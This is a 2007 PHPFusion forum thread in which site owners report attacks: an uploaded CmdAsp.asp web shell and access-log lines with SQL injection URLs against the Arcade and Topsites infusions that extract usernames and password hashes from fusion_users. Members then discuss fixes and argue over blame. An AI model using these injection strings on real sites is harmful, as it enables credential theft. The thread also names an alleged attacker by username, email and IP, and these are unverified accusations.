Hacker Alert!: PHPFusion 6 Support

Home
Search

Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.

Ok, sorry if this is in the wrong section. A member of my site has attempted to hack it today and I thought this would be important for you to know. The user didnt as such hack the site but used a upload form to upload a virus to my site which has now been deleted.

The user goes by the following information:
Username: marcus
Email: maceo @ dogmile.com (obtained via virus file)
IP: 217.219.95.237
Virus File Name: CmdAsp.asp

No other information is given. I am gathering proof and evidence to take action against this person, I would suggest you blacklist the above IP.

After uploading the virus the user then posts a message on the forums.

Edited by Falk on 04-04-2007 15:23, 17 y

0 replies

Disconnect quickly "Topsites" - they climb through him.!!

0 replies

85.105.216.170 - - [02/Apr/2007:19:31:11 +0300] "GET /images/photoalbum/album_5/img_0198_t1.jpg HTTP/1.1" 200 2746 "http://www.my_site/infusions/topliste/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"

0 replies

Quote

m_a_f wrote:
85.105.216.170 - - [02/Apr/2007:19:31:11 +0300] "GET /images/photoalbum/album_5/img_0198_t1.jpg HTTP/1.1" 200 2746 "http://www.my_site/infusions/topliste/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"

Whats this? and why would the topsites be a problem?

0 replies

Quote

lamborgini8 wrote:
Quote
m_a_f wrote:
85.105.216.170 - - [02/Apr/2007:19:31:11 +0300] "GET /images/photoalbum/album_5/img_0198_t1.jpg HTTP/1.1" 200 2746 "http://www.my_site/infusions/topliste/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"

Whats this? and why would the topsites be a problem?

It is the new arcade infusion exploit. :D :D

0 replies

87.101.240.9 - - [03/Apr/2007:13:59:22 +0300] "GET /bf/infusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* HTTP/1.1" 200 171 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

its from acces_log

"they" got my database deleted ...

0 replies

Quote

Tiido wrote:
87.101.240.9 - - [03/Apr/2007:13:59:22 +0300] "GET /bf/infusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* HTTP/1.1" 200 171 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

its from acces_log

"they" got my database deleted ...

But this 'hacker' is lamer. :D He used only default arcade infusion exploit. :(

0 replies

lol .... BloodKiller, are you going to explain how to fix these exploits your finding.

0 replies

Quote

uctxs wrote:
lol .... BloodKiller, are you going to explain how to fix these exploits your finding.

Simple. Change your site prefix (for example fusion_ into 71jFksjsudOQP02_) and you will live safely. ;)

0 replies

yes disable topsite and arcede infusions

0 replies

and a way starglowone can fix the bug?

0 replies

I don't have the arcade infusion anyway and I will wait and see what my co admin discovers first.

0 replies

Ok, heres a fix. I got help from Digi. I really hope i got it right now. So use these files and you should be safe. As usual, backup before. Update your arcade with these files.

0 replies

Bloodkiller: Could you explain how changing the names of tables would protect you from this Exploit?

Using mysql as of version 5.0.2 its REALLY easy to retrieve the tablenames, just alter the above request a bit and your on your way to hacker heaven again..:(

I will not post here how to do it (using php-fusion my self and i don't want these kind of things floating around in public..).

Just recently had my site hacked by the Arcade crap.. Also found out that calendar_panel has the same problem, good damn who makes these crapy pieces of software???:@

0 replies

Quote

Forseti wrote:
Bloodkiller: Could you explain how changing the names of tables would protect you from this Exploit?

Using mysql as of version 5.0.2 its REALLY easy to retrieve the tablenames, just alter the above request a bit and your on your way to hacker heaven again..:(

I will not post here how to do it (using php-fusion my self and i don't want these kind of things floating around in public..).

Just recently had my site hacked by the Arcade crap.. Also found out that calendar_panel has the same problem, good damn who makes these crapy pieces of software???:@

if the arcade is so crappy, why use it? Its your choice, we havent told you t use it.

0 replies

Quote

StarglowOne wrote:
Quote
Forseti wrote:
Bloodkiller: Could you explain how changing the names of tables would protect you from this Exploit?

Using mysql as of version 5.0.2 its REALLY easy to retrieve the tablenames, just alter the above request a bit and your on your way to hacker heaven again..:(

I will not post here how to do it (using php-fusion my self and i don't want these kind of things floating around in public..).

Just recently had my site hacked by the Arcade crap.. Also found out that calendar_panel has the same problem, good damn who makes these crapy pieces of software???:@

if the arcade is so crappy, why use it? Its your choice, we havent told you t use it.

LOL i guess your one of the guys who did a NOT SO GOOD JOB..

Why not say "hey Im sorry our software got your site hacked and all your user passwords comprimised but here is the solution to get your site up and runing again in a safe way.."??? Do you really realise what this software has done?? I would be a bit more noble in my sayings if i were in any way involved in this software. But you are correct, its my choice I hope we all learn from this and:

1) Make BETTER software (with SECURITY in #1 position)
2) Don't Install cool plugins (or infusions in this case) that hasn't been developed by you (and you know its secure) or by someone you really really trust.
3) Keep your site up to date with the latest version of softwares and also regulary search the internet for exploits or hacks being used on your software. (The third point i really hope is being merged into next versions of php-fusion so that we don't have to experience these kind of widely spreading attacks).

0 replies

So you mean that it is only infusions that make sites using this cms insecure? At least thats how it sound when you're writing. But i know there has been sequrity leaks in the cms itself, but where were you then complianing about a badly written cms?

We who make the infusions/mods make misstakes too, so have the cms author, and both of us made fast fixes to secure the scripts again.

Sure there was a sequrity error in the arcade, but we at least made a update and fixed it.
The biggest problem i see with this exploit is that users using the arcade havent updated their infusions with the fixes and have used toplist too and forgott to defuse that one when it had the same exploit. The fix for the arcade was released yesterday as soon as i had finished going through the code.

So in my opinion, instead of talking down others work, why not help out instead.

And i do know what this software has done, but it seem like everyone blames the arcade solely, when there has been the exact same exploit in other infusion, and there hasnt been any fixes for that one yet that i know of.

0 replies

OK fellas, no need to bicker amongst ourselves, the issue with Arcade infusion has been dealt with, knock it off.

Nota Bene: StarglowOne did not write the Arcade infusion for starters.

0 replies

Category Forum

Bugs and Errors - 6

Labels

None yet

Statistics

Views 0 views
Posts 17 posts
Votes 0 votes
Topic users 10 members

0 participants

Notifications

Track thread

You are not receiving notifications from this thread.

Hacker Alert!

17 posts

PHPFusion

Resources

Community

Development